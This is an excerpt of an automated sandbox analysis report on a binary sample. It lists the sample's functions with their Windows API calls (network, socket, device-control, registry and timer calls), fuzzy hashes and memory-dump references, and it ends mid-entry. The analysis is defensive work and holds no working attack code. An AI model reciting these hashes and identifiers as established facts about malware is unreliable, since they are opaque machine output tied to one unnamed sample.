                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2864067406-0
                                                                                                                • Opcode ID: 681568fecafa662230dedce7e7200ee1a2a8283cb0e4f6e0894b20cbec0a5ac2
                                                                                                                • Instruction ID: d49655eff932c487798bf442342ae5cb9306c74978b342273a3722571309a05e
                                                                                                                • Opcode Fuzzy Hash: 681568fecafa662230dedce7e7200ee1a2a8283cb0e4f6e0894b20cbec0a5ac2
                                                                                                                • Instruction Fuzzy Hash: F221F335510028EFDF258F54E899EEA7BB5FF4A710F144069F905872A2C3319DA1DB90
                                                                                                                Function 0025497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002549B7
                                                                                                                  • Part of subcall function 00254A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00254A60
                                                                                                                  • Part of subcall function 00254A41: InternetCloseHandle.WININET(00000000), ref: 00254AFD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1463438336-0
                                                                                                                • Opcode ID: 9a0a4a7807197475a8e51487b206773f23a5bad4f91b77e7de000a200c5c5e97
                                                                                                                • Instruction ID: 4ade8f14c3db71215ef3873d3676f131f8962f5735fc094e55809ba3cb9d82d9
                                                                                                                • Opcode Fuzzy Hash: 9a0a4a7807197475a8e51487b206773f23a5bad4f91b77e7de000a200c5c5e97
                                                                                                                • Instruction Fuzzy Hash: D9210435260605BFDB11AF60DC15FBBF7A9FF48706F10400AFE0186250EB71D868AB98
                                                                                                                Function 00268834 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 002688A3
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002688BD
                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002688CB
                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002688D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169480361-0
                                                                                                                • Opcode ID: 6be95156af034c5554041bf7ad9320574904e06a61f7b6add096efc950a3a8fe
                                                                                                                • Instruction ID: 2a685a7d203049b2f390000e915427e05356b1a5a3356e3b7731af87ef01a83d
                                                                                                                • Opcode Fuzzy Hash: 6be95156af034c5554041bf7ad9320574904e06a61f7b6add096efc950a3a8fe
                                                                                                                • Instruction Fuzzy Hash: A1119635355114AFDB14AB24DC05FAA77A9EF45320F144215F516C72D2CB74AC64CB90
                                                                                                                Function 0025900C Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 0025906D
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 0025907F
                                                                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 0025908C
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 002590A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastacceptselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 385091864-0
                                                                                                                • Opcode ID: f88270d5dc4b6cfb8983ef063caeb42ad1851774cb2327b350c7b245b1cd86db
                                                                                                                • Instruction ID: b36fe1cc60d6c904220800becff290dc03b1cc0025c72c593104e28c234993ec
                                                                                                                • Opcode Fuzzy Hash: f88270d5dc4b6cfb8983ef063caeb42ad1851774cb2327b350c7b245b1cd86db
                                                                                                                • Instruction Fuzzy Hash: 9B21A176A00124AFDB10DF69DC84A9ABBFCEF49710F00816AF809D7290DA749A85CF90
                                                                                                                Function 002418E8 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00242CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002418FD,?,?,?,002426BC,00000000,000000EF,00000119,?,?), ref: 00242CB9
                                                                                                                  • Part of subcall function 00242CAA: lstrcpyW.KERNEL32(00000000,?,?,002418FD,?,?,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00242CDF
                                                                                                                  • Part of subcall function 00242CAA: lstrcmpiW.KERNEL32(00000000,?,002418FD,?,?,?,002426BC,00000000,000000EF,00000119,?,?), ref: 00242D10
                                                                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00241916
                                                                                                                • lstrcpyW.KERNEL32(00000000,?,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 0024193C
                                                                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,002426BC,00000000,000000EF,00000119,?,?,00000000), ref: 00241970
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                                                                • String ID: cdecl
                                                                                                                • API String ID: 4031866154-3896280584
                                                                                                                • Opcode ID: 83601784681b4eeec72c4de3be89c0358ff6d654ab75e2a80ac448b9fd539618
                                                                                                                • Instruction ID: fc75fd0964e679bc37742f2aa4b36ebd9fe3d3896f9e5a052b5571995547a9f8
                                                                                                                • Opcode Fuzzy Hash: 83601784681b4eeec72c4de3be89c0358ff6d654ab75e2a80ac448b9fd539618
                                                                                                                • Instruction Fuzzy Hash: BF11D63A120301AFCB19AF74D859D7A77B4FF45350B40802AF806CB294EB71987587A0
                                                                                                                Function 00233D46 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00233D65
                                                                                                                  • Part of subcall function 002245EC: __FF_MSGBANNER.LIBCMT ref: 00224603
                                                                                                                  • Part of subcall function 002245EC: __NMSG_WRITE.LIBCMT ref: 0022460A
                                                                                                                  • Part of subcall function 002245EC: RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,?,?,?,00220127,?,0020125D,00000058,?,?), ref: 0022462F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 614378929-0
                                                                                                                • Opcode ID: 26d502dab011ae09bce53ca4ea2de5228dcfe846901bb6b6ffbc9752c340f1d0
                                                                                                                • Instruction ID: cee2d9eebe4c2d06501cc73f7835fbe85c0b3caef43bd6167ad6203a0ceed926
                                                                                                                • Opcode Fuzzy Hash: 26d502dab011ae09bce53ca4ea2de5228dcfe846901bb6b6ffbc9752c340f1d0
                                                                                                                • Instruction Fuzzy Hash: 3311E37292222ABBDB317FB0BC487AA3B98BF00360F504525F9498A191DF74CB74CE51
                                                                                                                Function 00201E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00201E87
                                                                                                                  • Part of subcall function 002038E4: _memset.LIBCMT ref: 00203965
                                                                                                                  • Part of subcall function 002038E4: _wcscpy.LIBCMT ref: 002039B5
                                                                                                                  • Part of subcall function 002038E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002039C6
                                                                                                                • KillTimer.USER32(?,00000001), ref: 00201EDC
                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00201EEB
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00274526
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1378193009-0
                                                                                                                • Opcode ID: ea002ca90961a4971a5e68d96d833d32ced3ac44a3e1883bf03a7f43411613d1
                                                                                                                • Instruction ID: 2514000b1b8b990aa84464b20783fca694c7ac0579eaf7dbacdb945cdef7e932
                                                                                                                • Opcode Fuzzy Hash: ea002ca90961a4971a5e68d96d833d32ced3ac44a3e1883bf03a7f43411613d1
                                                                                                                • Instruction Fuzzy Hash: 6921F9B1514794AFE7329B24D859FEBBBEC9B11308F04408DE69E57182C3745A98CB51
                                                                                                                Function 0024713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0024715C
                                                                                                                • _memset.LIBCMT ref: 0024717D
                                                                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002471CF
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 002471D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1157408455-0
                                                                                                                • Opcode ID: dd5c65700798bc77d11c620b99c4d3f25ab602945a1d217002966668f82e2850
                                                                                                                • Instruction ID: f5dc3b9efca4d7e18a53f1ecd119fd2d6483f2cc3bdf891fc38d9b128f1e8d3b
                                                                                                                • Opcode Fuzzy Hash: dd5c65700798bc77d11c620b99c4d3f25ab602945a1d217002966668f82e2850
                                                                                                                • Instruction Fuzzy Hash: BD110A759012287AE7206BA5AC4DFEBBB7CEF45760F10459AF508E71D0D3704E848BA4
                                                                                                                Function 002413D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002413EE
                                                                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00241409
                                                                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0024141F
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00241474
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                • String ID:
                                                                                                                • API String ID: 3137044355-0
                                                                                                                • Opcode ID: f108aefe217675ef6955b978f421dad29ae9794b1847eac9362f6f2421ac2dcf
                                                                                                                • Instruction ID: 9201f8458614e9a10a7f20dc27187abfb535e9bba0d29d882a5693df2e0cce80
                                                                                                                • Opcode Fuzzy Hash: f108aefe217675ef6955b978f421dad29ae9794b1847eac9362f6f2421ac2dcf
                                                                                                                • Instruction Fuzzy Hash: F221D379A10309EFDB24DF90DC88ADABBBCEF00700F00846DA51697050D7B4EAA8DF50
                                                                                                                Function 002592C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0024AEA5,?,?,00000000,00000008), ref: 0021F282
                                                                                                                  • Part of subcall function 0021F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0024AEA5,?,?,00000000,00000008), ref: 0021F2A6
                                                                                                                • gethostbyname.WSOCK32(?,?,?), ref: 002592F0
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 002592FB
                                                                                                                • _memmove.LIBCMT ref: 00259328
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00259333
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 1504782959-0
                                                                                                                • Opcode ID: 289a080370f5735370cd1312fcbefe069c18fb22394e57814f926a1278b08214
                                                                                                                • Instruction ID: 9bed6a468b9a25be1e40e4574ca4f530132ace2b760a0e581c1e2d68bee673d9
                                                                                                                • Opcode Fuzzy Hash: 289a080370f5735370cd1312fcbefe069c18fb22394e57814f926a1278b08214
                                                                                                                • Instruction Fuzzy Hash: F5115E75910209AFCB04FBA0DD56CEEB7B9AF143117144065F506A71A2DB30AE28DF61
                                                                                                                Function 0023C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0023C285
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0023C297
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0023C2AD
                                                                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0023C2C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 8cc914cd3780df8fbde786ce03a14756e41f42e78b3c856c2f09ac75f14b5fc9
                                                                                                                • Instruction ID: 46faeeda1d3a34ddc90bc7ecdc5de88e14b7e0072f5f1ad52bc11bc3e5c1c5d1
                                                                                                                • Opcode Fuzzy Hash: 8cc914cd3780df8fbde786ce03a14756e41f42e78b3c856c2f09ac75f14b5fc9
                                                                                                                • Instruction Fuzzy Hash: A0112EBA940218FFDB11DFE4CC85E9EBBB4FB08710F204092EA04B7294D671AE10DB94
                                                                                                                Function 00247C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00247C6C
                                                                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00247C9F
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00247CB5
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00247CBC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880819207-0
                                                                                                                • Opcode ID: af6d6ac883e29e41e76ca6efc646c597f531a7067f98e4faf5bc8fb789fe5c40
                                                                                                                • Instruction ID: e9b39ddd04c85dc831a0e73fc3b83d826f8dbfb38daf06b2a62e04c15a07775d
                                                                                                                • Opcode Fuzzy Hash: af6d6ac883e29e41e76ca6efc646c597f531a7067f98e4faf5bc8fb789fe5c40
                                                                                                                • Instruction Fuzzy Hash: 35110476A14214BFD716DFA8FC4CE9A7FAD9F04324F144216F825D3291D77089288BA0
                                                                                                                Function 0021C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
                                                                                                                • GetStockObject.GDI32(00000011), ref: 0021C66B
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3970641297-0
                                                                                                                • Opcode ID: 59d568051151d809791bbda5662bb40e34b7a5a33812ef2015a50186170b2c71
                                                                                                                • Instruction ID: 6b085d6078538b2bf82c56d6507f18402be8881e6d3bb42c3f4a6b4ca35f316b
                                                                                                                • Opcode Fuzzy Hash: 59d568051151d809791bbda5662bb40e34b7a5a33812ef2015a50186170b2c71
                                                                                                                • Instruction Fuzzy Hash: 1711E176111689BFDF014FA0AC44EEABBADEF58350F150211FA0442050C731DCB0DFA0
                                                                                                                Function 0026FF04 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?,?,?), ref: 0026FF85
                                                                                                                  • Part of subcall function 0021AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0021AF8E
                                                                                                                • GetClientRect.USER32(?,?), ref: 0026FF2F
                                                                                                                • GetCursorPos.USER32(?), ref: 0026FF39
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026FF44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4127811313-0
                                                                                                                • Opcode ID: 8ea6358ba938b6263e558bb165646c4b9ed0a649553f1059300218937b237ede
                                                                                                                • Instruction ID: bbc5cf46e65ffed383bfe09fdeb55f687ed4beafda50c17816360912b9307df0
                                                                                                                • Opcode Fuzzy Hash: 8ea6358ba938b6263e558bb165646c4b9ed0a649553f1059300218937b237ede
                                                                                                                • Instruction Fuzzy Hash: EB11FE3A51101AABDF00DF68FD95CEE77B8FB06300B100565F911E3591D770A9A69BA1
                                                                                                                Function 002449D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 002449EE
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 00244A13
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 00244A1D
                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,0024354D,?,002445D5,?,00008000), ref: 00244A50
                                                                                                                Memory Dump Source
